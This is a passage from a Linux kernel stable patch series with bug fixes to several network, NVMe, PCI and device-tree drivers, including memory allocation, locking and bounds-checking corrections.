++		case 0 ... 4:
++		case 6 ... 7:
++			return 1;
++		}
++		break;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 981cc32480474..19506f2be4d40 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -916,14 +916,18 @@ static inline void dpaa_setup_egress(const struct dpaa_priv *priv,
+ 	}
+ }
+ 
+-static void dpaa_fq_setup(struct dpaa_priv *priv,
+-			  const struct dpaa_fq_cbs *fq_cbs,
+-			  struct fman_port *tx_port)
++static int dpaa_fq_setup(struct dpaa_priv *priv,
++			 const struct dpaa_fq_cbs *fq_cbs,
++			 struct fman_port *tx_port)
+ {
+ 	int egress_cnt = 0, conf_cnt = 0, num_portals = 0, portal_cnt = 0, cpu;
+ 	const cpumask_t *affine_cpus = qman_affine_cpus();
+-	u16 channels[NR_CPUS];
+ 	struct dpaa_fq *fq;
++	u16 *channels;
++
++	channels = kcalloc(num_possible_cpus(), sizeof(u16), GFP_KERNEL);
++	if (!channels)
++		return -ENOMEM;
+ 
+ 	for_each_cpu_and(cpu, affine_cpus, cpu_online_mask)
+ 		channels[num_portals++] = qman_affine_channel(cpu);
+@@ -982,6 +986,10 @@ static void dpaa_fq_setup(struct dpaa_priv *priv,
+ 				break;
+ 		}
+ 	}
++
++	kfree(channels);
++
++	return 0;
+ }
+ 
+ static inline int dpaa_tx_fq_to_id(const struct dpaa_priv *priv,
+@@ -3454,7 +3462,9 @@ static int dpaa_eth_probe(struct platform_device *pdev)
+ 	 */
+ 	dpaa_eth_add_channel(priv->channel, &pdev->dev);
+ 
+-	dpaa_fq_setup(priv, &dpaa_fq_cbs, priv->mac_dev->port[TX]);
++	err = dpaa_fq_setup(priv, &dpaa_fq_cbs, priv->mac_dev->port[TX]);
++	if (err)
++		goto free_dpaa_bps;
+ 
+ 	/* Create a congestion group for this netdev, with
+ 	 * dynamically-allocated CGR ID.
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c b/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
+index 769e936a263c9..fcb0cba4611e1 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
+@@ -515,12 +515,16 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 			     struct netlink_ext_ack *extack)
+ {
+ 	const cpumask_t *cpus = qman_affine_cpus();
+-	bool needs_revert[NR_CPUS] = {false};
+ 	struct qman_portal *portal;
+ 	u32 period, prev_period;
+ 	u8 thresh, prev_thresh;
++	bool *needs_revert;
+ 	int cpu, res;
+ 
++	needs_revert = kcalloc(num_possible_cpus(), sizeof(bool), GFP_KERNEL);
++	if (!needs_revert)
++		return -ENOMEM;
++
+ 	period = c->rx_coalesce_usecs;
+ 	thresh = c->rx_max_coalesced_frames;
+ 
+@@ -543,6 +547,8 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 		needs_revert[cpu] = true;
+ 	}
+ 
++	kfree(needs_revert);
++
+ 	return 0;
+ 
+ revert_values:
+@@ -556,6 +562,8 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 		qman_dqrr_set_ithresh(portal, prev_thresh);
+ 	}
+ 
++	kfree(needs_revert);
++
+ 	return res;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 9dbfbc90485e4..3f01942e4982d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -611,6 +611,9 @@ ice_prepare_for_reset(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 			memset(&vsi->mqprio_qopt, 0, sizeof(vsi->mqprio_qopt));
+ 		}
+ 	}
++
++	if (vsi->netdev)
++		netif_device_detach(vsi->netdev);
+ skip:
+ 
+ 	/* clear SW filtering DB */
+@@ -2630,11 +2633,11 @@ static void ice_vsi_assign_bpf_prog(struct ice_vsi *vsi, struct bpf_prog *prog)
+ 	int i;
+ 
+ 	old_prog = xchg(&vsi->xdp_prog, prog);
+-	if (old_prog)
+-		bpf_prog_put(old_prog);
+-
+ 	ice_for_each_rxq(vsi, i)
+ 		WRITE_ONCE(vsi->rx_rings[i]->xdp_prog, vsi->xdp_prog);
++
++	if (old_prog)
++		bpf_prog_put(old_prog);
+ }
+ 
+ /**
+@@ -2883,6 +2886,18 @@ int ice_vsi_determine_xdp_res(struct ice_vsi *vsi)
+ 	return 0;
+ }
+ 
++/**
++ * ice_max_xdp_frame_size - returns the maximum allowed frame size for XDP
++ * @vsi: Pointer to VSI structure
++ */
++static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
++{
++	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
++		return ICE_RXBUF_1664;
++	else
++		return ICE_RXBUF_3072;
++}
++
+ /**
+  * ice_xdp_setup_prog - Add or remove XDP eBPF program
+  * @vsi: VSI to setup XDP for
+@@ -2893,17 +2908,26 @@ static int
+ ice_xdp_setup_prog(struct ice_vsi *vsi, struct bpf_prog *prog,
+ 		   struct netlink_ext_ack *extack)
+ {
+-	int frame_size = vsi->netdev->mtu + ICE_ETH_PKT_HDR_PAD;
+-	bool if_running = netif_running(vsi->netdev);
++	unsigned int frame_size = vsi->netdev->mtu + ICE_ETH_PKT_HDR_PAD;
+ 	int ret = 0, xdp_ring_err = 0;
++	bool if_running;
+ 
+-	if (frame_size > vsi->rx_buf_len) {
++	if (frame_size > ice_max_xdp_frame_size(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large for loading XDP");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	/* hot swap progs and avoid toggling link */
++	if (ice_is_xdp_ena_vsi(vsi) == !!prog) {
++		ice_vsi_assign_bpf_prog(vsi, prog);
++		return 0;
++	}
++
++	if_running = netif_running(vsi->netdev) &&
++		     !test_and_set_bit(ICE_VSI_DOWN, vsi->state);
++
+ 	/* need to stop netdev while setting up the program for Rx rings */
+-	if (if_running && !test_and_set_bit(ICE_VSI_DOWN, vsi->state)) {
++	if (if_running) {
+ 		ret = ice_down(vsi);
+ 		if (ret) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Preparing device for XDP attach failed");
+@@ -2932,13 +2956,6 @@ ice_xdp_setup_prog(struct ice_vsi *vsi, struct bpf_prog *prog,
+ 		xdp_ring_err = ice_realloc_zc_buf(vsi, false);
+ 		if (xdp_ring_err)
+ 			NL_SET_ERR_MSG_MOD(extack, "Freeing XDP Rx resources failed");
+-	} else {
+-		/* safe to call even when prog == vsi->xdp_prog as
+-		 * dev_xdp_install in net/core/dev.c incremented prog's
+-		 * refcount so corresponding bpf_prog_put won't cause
+-		 * underflow
+-		 */
+-		ice_vsi_assign_bpf_prog(vsi, prog);
+ 	}
+ 
+ 	if (if_running)
+@@ -7140,6 +7157,7 @@ static void ice_update_pf_netdev_link(struct ice_pf *pf)
+  */
+ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ {
++	struct ice_vsi *vsi = ice_get_main_vsi(pf);
+ 	struct device *dev = ice_pf_to_dev(pf);
+ 	struct ice_hw *hw = &pf->hw;
+ 	bool dvm;
+@@ -7292,6 +7310,9 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 		ice_rebuild_arfs(pf);
+ 	}
+ 
++	if (vsi && vsi->netdev)
++		netif_device_attach(vsi->netdev);
++
+ 	ice_update_pf_netdev_link(pf);
+ 
+ 	/* tell the firmware we are up */
+@@ -7322,18 +7343,6 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 	dev_err(dev, "Rebuild failed, unload and reload driver\n");
+ }
+ 
+-/**
+- * ice_max_xdp_frame_size - returns the maximum allowed frame size for XDP
+- * @vsi: Pointer to VSI structure
+- */
+-static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
+-{
+-	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
+-		return ICE_RXBUF_1664;
+-	else
+-		return ICE_RXBUF_3072;
+-}
+-
+ /**
+  * ice_change_mtu - NDO callback to change the MTU
+  * @netdev: network interface device structure
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 81d9a5338be5e..76bd41058f3a9 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6925,10 +6925,20 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 
+ static void igb_tsync_interrupt(struct igb_adapter *adapter)
+ {
++	const u32 mask = (TSINTR_SYS_WRAP | E1000_TSICR_TXTS |
++			  TSINTR_TT0 | TSINTR_TT1 |
++			  TSINTR_AUTT0 | TSINTR_AUTT1);
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	u32 tsicr = rd32(E1000_TSICR);
+ 	struct ptp_clock_event event;
+ 
++	if (hw->mac.type == e1000_82580) {
++		/* 82580 has a hardware bug that requires an explicit
++		 * write to clear the TimeSync interrupt cause.
++		 */
++		wr32(E1000_TSICR, tsicr & mask);
++	}
++
+ 	if (tsicr & TSINTR_SYS_WRAP) {
+ 		event.type = PTP_CLOCK_PPS;
+ 		if (adapter->ptp_caps.pps)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 39f8f28288aaa..6ae2d0b723c82 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -7063,6 +7063,7 @@ static void igc_io_resume(struct pci_dev *pdev)
+ 	rtnl_lock();
+ 	if (netif_running(netdev)) {
+ 		if (igc_open(netdev)) {
++			rtnl_unlock();
+ 			netdev_err(netdev, "igc_open failed after reset\n");
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/microsoft/mana/mana.h b/drivers/net/ethernet/microsoft/mana/mana.h
+index 41c99eabf40a0..2b00d6a291171 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana.h
++++ b/drivers/net/ethernet/microsoft/mana/mana.h
+@@ -86,6 +86,8 @@ struct mana_txq {
+ 
+ 	atomic_t pending_sends;
+ 
++	bool napi_initialized;
++
+ 	struct mana_stats_tx stats;
+ };
+ 
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index e7d1ce68f05e3..b52612eef0a60 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1391,10 +1391,12 @@ static void mana_destroy_txq(struct mana_port_context *apc)
+ 
+ 	for (i = 0; i < apc->num_queues; i++) {
+ 		napi = &apc->tx_qp[i].tx_cq.napi;
+-		napi_synchronize(napi);
+-		napi_disable(napi);
+-		netif_napi_del(napi);
+-
++		if (apc->tx_qp[i].txq.napi_initialized) {
++			napi_synchronize(napi);
++			napi_disable(napi);
++			netif_napi_del(napi);
++			apc->tx_qp[i].txq.napi_initialized = false;
++		}
+ 		mana_destroy_wq_obj(apc, GDMA_SQ, apc->tx_qp[i].tx_object);
+ 
+ 		mana_deinit_cq(apc, &apc->tx_qp[i].tx_cq);
+@@ -1450,6 +1452,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ 		txq->ndev = net;
+ 		txq->net_txq = netdev_get_tx_queue(net, i);
+ 		txq->vp_offset = apc->tx_vp_offset;
++		txq->napi_initialized = false;
+ 		skb_queue_head_init(&txq->pending_skbs);
+ 
+ 		memset(&spec, 0, sizeof(spec));
+@@ -1514,6 +1517,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ 
+ 		netif_napi_add_tx(net, &cq->napi, mana_poll);
+ 		napi_enable(&cq->napi);
++		txq->napi_initialized = true;
+ 
+ 		mana_gd_ring_cq(cq->gdma_cq, SET_ARM_BIT);
+ 	}
+@@ -1525,7 +1529,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ }
+ 
+ static void mana_destroy_rxq(struct mana_port_context *apc,
+-			     struct mana_rxq *rxq, bool validate_state)
++			     struct mana_rxq *rxq, bool napi_initialized)
+ 
+ {
+ 	struct gdma_context *gc = apc->ac->gdma_dev->gdma_context;
+@@ -1539,15 +1543,15 @@ static void mana_destroy_rxq(struct mana_port_context *apc,
+ 
+ 	napi = &rxq->rx_cq.napi;
+ 
+-	if (validate_state)
++	if (napi_initialized) {
+ 		napi_synchronize(napi);
+ 
+-	napi_disable(napi);
++		napi_disable(napi);
+ 
++		netif_napi_del(napi);
++	}
+ 	xdp_rxq_info_unreg(&rxq->xdp_rxq);
+ 
+-	netif_napi_del(napi);
+-
+ 	mana_destroy_wq_obj(apc, GDMA_RQ, rxq->rxobj);
+ 
+ 	mana_deinit_cq(apc, &rxq->rx_cq);
+diff --git a/drivers/net/mctp/mctp-serial.c b/drivers/net/mctp/mctp-serial.c
+index 9f9eaf896047c..fae9628f9615f 100644
+--- a/drivers/net/mctp/mctp-serial.c
++++ b/drivers/net/mctp/mctp-serial.c
+@@ -91,8 +91,8 @@ static int next_chunk_len(struct mctp_serial *dev)
+ 	 * will be those non-escaped bytes, and does not include the escaped
+ 	 * byte.
+ 	 */
+-	for (i = 1; i + dev->txpos + 1 < dev->txlen; i++) {
+-		if (needs_escape(dev->txbuf[dev->txpos + i + 1]))
++	for (i = 1; i + dev->txpos < dev->txlen; i++) {
++		if (needs_escape(dev->txbuf[dev->txpos + i]))
+ 			break;
+ 	}
+ 
+diff --git a/drivers/net/usb/ipheth.c b/drivers/net/usb/ipheth.c
+index 6a769df0b4213..13381d87eeb09 100644
+--- a/drivers/net/usb/ipheth.c
++++ b/drivers/net/usb/ipheth.c
+@@ -353,8 +353,8 @@ static int ipheth_close(struct net_device *net)
+ {
+ 	struct ipheth_device *dev = netdev_priv(net);
+ 
+-	cancel_delayed_work_sync(&dev->carrier_work);
+ 	netif_stop_queue(net);
++	cancel_delayed_work_sync(&dev->carrier_work);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
+index 405e588f8a3a5..0f848d3185443 100644
+--- a/drivers/net/usb/usbnet.c
++++ b/drivers/net/usb/usbnet.c
+@@ -61,9 +61,6 @@
+ 
+ /*-------------------------------------------------------------------------*/
+ 
+-// randomly generated ethernet address
+-static u8	node_id [ETH_ALEN];
+-
+ /* use ethtool to change the level for any given device */
+ static int msg_level = -1;
+ module_param (msg_level, int, 0);
+@@ -1726,7 +1723,6 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 
+ 	dev->net = net;
+ 	strscpy(net->name, "usb%d", sizeof(net->name));
+-	eth_hw_addr_set(net, node_id);
+ 
+ 	/* rx and tx sides can use different message sizes;
+ 	 * bind() should set rx_urb_size in that case.
+@@ -1800,9 +1796,9 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 		goto out4;
+ 	}
+ 
+-	/* let userspace know we have a random address */
+-	if (ether_addr_equal(net->dev_addr, node_id))
+-		net->addr_assign_type = NET_ADDR_RANDOM;
++	/* this flags the device for user space */
++	if (!is_valid_ether_addr(net->dev_addr))
++		eth_hw_addr_random(net);
+ 
+ 	if ((dev->driver_info->flags & FLAG_WLAN) != 0)
+ 		SET_NETDEV_DEVTYPE(net, &wlan_type);
+@@ -2212,7 +2208,6 @@ static int __init usbnet_init(void)
+ 	BUILD_BUG_ON(
+ 		sizeof_field(struct sk_buff, cb) < sizeof(struct skb_data));
+ 
+-	eth_random_addr(node_id);
+ 	return 0;
+ }
+ module_init(usbnet_init);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
+index a4034d44609b2..94b1e4f15b413 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
+@@ -1089,6 +1089,7 @@ static int ieee_hw_init(struct ieee80211_hw *hw)
+ 	ieee80211_hw_set(hw, AMPDU_AGGREGATION);
+ 	ieee80211_hw_set(hw, SIGNAL_DBM);
+ 	ieee80211_hw_set(hw, REPORTS_TX_ACK_STATUS);
++	ieee80211_hw_set(hw, MFP_CAPABLE);
+ 
+ 	hw->extra_tx_headroom = brcms_c_get_header_len();
+ 	hw->queues = N_TX_QUEUES;
+diff --git a/drivers/net/wireless/marvell/mwifiex/main.h b/drivers/net/wireless/marvell/mwifiex/main.h
+index 63f861e6b28af..fb98eb342bd9a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/main.h
++++ b/drivers/net/wireless/marvell/mwifiex/main.h
+@@ -1301,6 +1301,9 @@ mwifiex_get_priv_by_id(struct mwifiex_adapter *adapter,
+ 
+ 	for (i = 0; i < adapter->priv_num; i++) {
+ 		if (adapter->priv[i]) {
++			if (adapter->priv[i]->bss_mode == NL80211_IFTYPE_UNSPECIFIED)
++				continue;
++
+ 			if ((adapter->priv[i]->bss_num == bss_num) &&
+ 			    (adapter->priv[i]->bss_type == bss_type))
+ 				break;
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index c309709ac9b55..54a969aa72bed 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3107,6 +3107,17 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 		    dmi_match(DMI_BOARD_NAME, "NS5x_7xPU") ||
+ 		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1"))
+ 			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
++	} else if (pdev->vendor == 0x144d && pdev->device == 0xa80d) {
++		/*
++		 * Exclude Samsung 990 Evo from NVME_QUIRK_SIMPLE_SUSPEND
++		 * because of high power consumption (> 2 Watt) in s2idle
++		 * sleep. Only some boards with Intel CPU are affected.
++		 */
++		if (dmi_match(DMI_BOARD_NAME, "GMxPXxx") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PG31") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1") ||
++		    dmi_match(DMI_BOARD_NAME, "PH6PG01_PH6PG71"))
++			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 76b9eb438268f..81574500a57c7 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -1816,8 +1816,10 @@ static u16 nvmet_tcp_install_queue(struct nvmet_sq *sq)
+ 	}
+ 
+ 	queue->nr_cmds = sq->size * 2;
+-	if (nvmet_tcp_alloc_cmds(queue))
++	if (nvmet_tcp_alloc_cmds(queue)) {
++		queue->nr_cmds = 0;
+ 		return NVME_SC_INTERNAL;
++	}
+ 	return 0;
+ }
+ 
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index f060583941027..ad897b2c0b14c 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
+@@ -1092,13 +1092,13 @@ void nvmem_device_put(struct nvmem_device *nvmem)
+ EXPORT_SYMBOL_GPL(nvmem_device_put);
+ 
+ /**
+- * devm_nvmem_device_get() - Get nvmem cell of device form a given id
++ * devm_nvmem_device_get() - Get nvmem device of device form a given id
+  *
+  * @dev: Device that requests the nvmem device.
+  * @id: name id for the requested nvmem device.
+  *
+- * Return: ERR_PTR() on error or a valid pointer to a struct nvmem_cell
+- * on success.  The nvmem_cell will be freed by the automatically once the
++ * Return: ERR_PTR() on error or a valid pointer to a struct nvmem_device
++ * on success.  The nvmem_device will be freed by the automatically once the
+  * device is freed.
+  */
+ struct nvmem_device *devm_nvmem_device_get(struct device *dev, const char *id)
+diff --git a/drivers/of/irq.c b/drivers/of/irq.c
+index 88c24d88c4b92..a8e306606c4bd 100644
+--- a/drivers/of/irq.c
++++ b/drivers/of/irq.c
+@@ -344,7 +344,8 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 	struct device_node *p;
+ 	const __be32 *addr;
+ 	u32 intsize;
+-	int i, res;
++	int i, res, addr_len;
++	__be32 addr_buf[3] = { 0 };
+ 
+ 	pr_debug("of_irq_parse_one: dev=%pOF, index=%d\n", device, index);
+ 
+@@ -353,13 +354,19 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 		return of_irq_parse_oldworld(device, index, out_irq);
+ 
+ 	/* Get the reg property (if any) */
+-	addr = of_get_property(device, "reg", NULL);
++	addr = of_get_property(device, "reg", &addr_len);
++
++	/* Prevent out-of-bounds read in case of longer interrupt parent address size */
++	if (addr_len > (3 * sizeof(__be32)))
++		addr_len = 3 * sizeof(__be32);
++	if (addr)
++		memcpy(addr_buf, addr, addr_len);
+ 
+ 	/* Try the new-style interrupts-extended first */
+ 	res = of_parse_phandle_with_args(device, "interrupts-extended",
+ 					"#interrupt-cells", index, out_irq);
+ 	if (!res)
+-		return of_irq_parse_raw(addr, out_irq);
++		return of_irq_parse_raw(addr_buf, out_irq);
+ 
+ 	/* Look for the interrupt parent. */
+ 	p = of_irq_find_parent(device);
+@@ -389,7 +396,7 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 
+ 
+ 	/* Check if there are any interrupt-map translations to process */
+-	res = of_irq_parse_raw(addr, out_irq);
++	res = of_irq_parse_raw(addr_buf, out_irq);
+  out:
+ 	of_node_put(p);
+ 	return res;
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 6007ffcb4752a..e738013c6d4f5 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -35,6 +35,11 @@
+ #define PCIE_DEVICEID_SHIFT	16
+ 
+ /* Application registers */
++#define PID				0x000
++#define RTL				GENMASK(15, 11)
++#define RTL_SHIFT			11
++#define AM6_PCI_PG1_RTL_VER		0x15
++
+ #define CMD_STATUS			0x004
+ #define LTSSM_EN_VAL		        BIT(0)
+ #define OB_XLAT_EN_VAL		        BIT(1)
+@@ -105,6 +110,8 @@
+ 
+ #define to_keystone_pcie(x)		dev_get_drvdata((x)->dev)
+ 
++#define PCI_DEVICE_ID_TI_AM654X		0xb00c
++
+ struct ks_pcie_of_data {
+ 	enum dw_pcie_device_mode mode;
+ 	const struct dw_pcie_host_ops *host_ops;
+@@ -519,7 +526,11 @@ static int ks_pcie_start_link(struct dw_pcie *pci)
+ static void ks_pcie_quirk(struct pci_dev *dev)
+ {
+ 	struct pci_bus *bus = dev->bus;
++	struct keystone_pcie *ks_pcie;
++	struct device *bridge_dev;
+ 	struct pci_dev *bridge;
++	u32 val;
++
+ 	static const struct pci_device_id rc_pci_devids[] = {
+ 		{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCIE_RC_K2HK),
+ 		 .class = PCI_CLASS_BRIDGE_PCI_NORMAL, .class_mask = ~0, },
+@@ -531,6 +542,11 @@ static void ks_pcie_quirk(struct pci_dev *dev)
+ 		 .class = PCI_CLASS_BRIDGE_PCI_NORMAL, .class_mask = ~0, },
+ 		{ 0, },
+ 	};
++	static const struct pci_device_id am6_pci_devids[] = {
++		{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_AM654X),
++		 .class = PCI_CLASS_BRIDGE_PCI << 8, .class_mask = ~0, },
++		{ 0, },
++	};
+ 
+ 	if (pci_is_root_bus(bus))
+ 		bridge = dev;
+@@ -552,10 +568,36 @@ static void ks_pcie_quirk(struct pci_dev *dev)
+ 	 */
+ 	if (pci_match_id(rc_pci_devids, bridge)) {
+ 		if (pcie_get_readrq(dev) > 256) {
+-			dev_info(&dev->dev, "limiting MRRS to 256\n");
++			dev_info(&dev->dev, "limiting MRRS to 256 bytes\n");
+ 			pcie_set_readrq(dev, 256);
+ 		}
+ 	}
++
++	/*
++	 * Memory transactions fail with PCI controller in AM654 PG1.0
++	 * when MRRS is set to more than 128 bytes. Force the MRRS to
++	 * 128 bytes in all downstream devices.
++	 */
++	if (pci_match_id(am6_pci_devids, bridge)) {
++		bridge_dev = pci_get_host_bridge_device(dev);
++		if (!bridge_dev && !bridge_dev->parent)
++			return;
++
++		ks_pcie = dev_get_drvdata(bridge_dev->parent);
++		if (!ks_pcie)
++			return;
++
++		val = ks_pcie_app_readl(ks_pcie, PID);
++		val &= RTL;
++		val >>= RTL_SHIFT;
++		if (val != AM6_PCI_PG1_RTL_VER)
++			return;
++
++		if (pcie_get_readrq(dev) > 128) {
++			dev_info(&dev->dev, "limiting MRRS to 128 bytes\n");
++			pcie_set_readrq(dev, 128);
++		}
++	}
+ }
+ DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, ks_pcie_quirk);
+ 
+diff --git a/drivers/pci/hotplug/pnv_php.c b/drivers/pci/hotplug/pnv_php.c
+index 881d420637bf1..092c9ac0d26d2 100644
+--- a/drivers/pci/hotplug/pnv_php.c
++++ b/drivers/pci/hotplug/pnv_php.c
+@@ -39,7 +39,6 @@ static void pnv_php_disable_irq(struct pnv_php_slot *php_slot,
+ 				bool disable_device)
+ {
+ 	struct pci_dev *pdev = php_slot->pdev;
+-	int irq = php_slot->irq;
+ 	u16 ctrl;
+ 
+ 	if (php_slot->irq > 0) {
+@@ -58,7 +57,7 @@ static void pnv_php_disable_irq(struct pnv_php_slot *php_slot,
+ 		php_slot->wq = NULL;
+ 	}
+ 
+-	if (disable_device || irq > 0) {
++	if (disable_device) {
+ 		if (pdev->msix_enabled)
+ 			pci_disable_msix(pdev);
+ 		else if (pdev->msi_enabled)
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 2d373ab3ccb38..f7592348ebeee 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -5584,10 +5584,12 @@ static void pci_bus_lock(struct pci_bus *bus)
+ {
+ 	struct pci_dev *dev;
+ 
++	pci_dev_lock(bus->self);
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+-		pci_dev_lock(dev);
+ 		if (dev->subordinate)
+ 			pci_bus_lock(dev->subordinate);
++		else
++			pci_dev_lock(dev);
+ 	}
+ }
+ 
+@@ -5599,8 +5601,10 @@ static void pci_bus_unlock(struct pci_bus *bus)
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
++	pci_dev_unlock(bus->self);
+ }
+ 
+ /* Return 1 on successful lock, 0 on contention */
+@@ -5608,15 +5612,15 @@ static int pci_bus_trylock(struct pci_bus *bus)
+ {
+ 	struct pci_dev *dev;
+ 
++	if (!pci_dev_trylock(bus->self))
++		return 0;
++
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+-		if (!pci_dev_trylock(dev))
+-			goto unlock;
+ 		if (dev->subordinate) {
+-			if (!pci_bus_trylock(dev->subordinate)) {
+-				pci_dev_unlock(dev);
++			if (!pci_bus_trylock(dev->subordinate))
+ 				goto unlock;
+-			}
+-		}
++		} else if (!pci_dev_trylock(dev))
++			goto unlock;
+ 	}
+ 	return 1;
+ 
+@@ -5624,8 +5628,10 @@ static int pci_bus_trylock(struct pci_bus *bus)
+ 	list_for_each_entry_continue_reverse(dev, &bus->devices, bus_list) {
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
++	pci_dev_unlock(bus->self);
+ 	return 0;
+ }
+ 
+@@ -5657,9 +5663,10 @@ static void pci_slot_lock(struct pci_slot *slot)
+ 	list_for_each_entry(dev, &slot->bus->devices, bus_list) {
+ 		if (!dev->slot || dev->slot != slot)
+ 			continue;
+-		pci_dev_lock(dev);
+ 		if (dev->subordinate)
+ 			pci_bus_lock(dev->subordinate);
++		else
++			pci_dev_lock(dev);
+ 	}
+ }
+ 
+@@ -5685,14 +5692,13 @@ static int pci_slot_trylock(struct pci_slot *slot)
+ 	list_for_each_entry(dev, &slot->bus->devices, bus_list) {
+ 		if (!dev->slot || dev->slot != slot)
+ 			continue;
+-		if (!pci_dev_trylock(dev))
+-			goto unlock;
+ 		if (dev->subordinate) {
+ 			if (!pci_bus_trylock(dev->subordinate)) {
+ 				pci_dev_unlock(dev);
+ 				goto unlock;
+ 			}
+-		}
++		} else if (!pci_dev_trylock(dev))
++			goto unlock;
+ 	}
+ 	return 1;
+ 
+@@ -5703,7 +5709,8 @@ static int pci_slot_trylock(struct pci_slot *slot)
+ 			continue;
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
+ 	return 0;
+ }
+diff --git a/drivers/pcmcia/yenta_socket.c b/drivers/pcmcia/yenta_socket.c
+index 3966a6ceb1ac7..a1c16352c01c6 100644
+--- a/drivers/pcmcia/yenta_socket.c
++++ b/drivers/pcmcia/yenta_socket.c
+@@ -638,11 +638,11 @@ static int yenta_search_one_res(struct resource *root, struct resource *res,
+ 		start = PCIBIOS_MIN_CARDBUS_IO;
+ 		end = ~0U;
+ 	} else {
+-		unsigned long avail = root->end - root->start;
++		unsigned long avail = resource_size(root);
+ 		int i;
